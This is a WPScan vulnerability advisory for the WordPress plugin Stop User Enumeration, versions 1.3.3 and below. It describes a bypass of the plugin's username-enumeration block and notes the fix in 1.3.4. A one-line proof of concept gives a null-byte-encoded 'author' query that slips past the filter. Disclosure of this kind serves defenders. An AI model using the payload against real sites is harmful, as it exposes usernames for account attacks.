Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass

Description	Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames.
Proof of Concept	`Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1`

Affects Plugin

stop-user-enumeration

fixed in version 1.3.4

References

URL	https://wordpress.org/plugins/stop-user-enumeration/changelog/
URL	https://plugins.trac.wordpress.org/changeset/1390935/stop-user-enumeration

Classification

Type

BYPASS

Miscellaneous

Submitter	Carlos Montiers Aguilera
Views	2077
Verified	No
WPVDB ID	8436

Timeline

Publicly Published	2016-04-01 (almost 3 years ago)
Added	2016-04-11 (almost 3 years ago)
Last Updated	2016-04-11 (almost 3 years ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.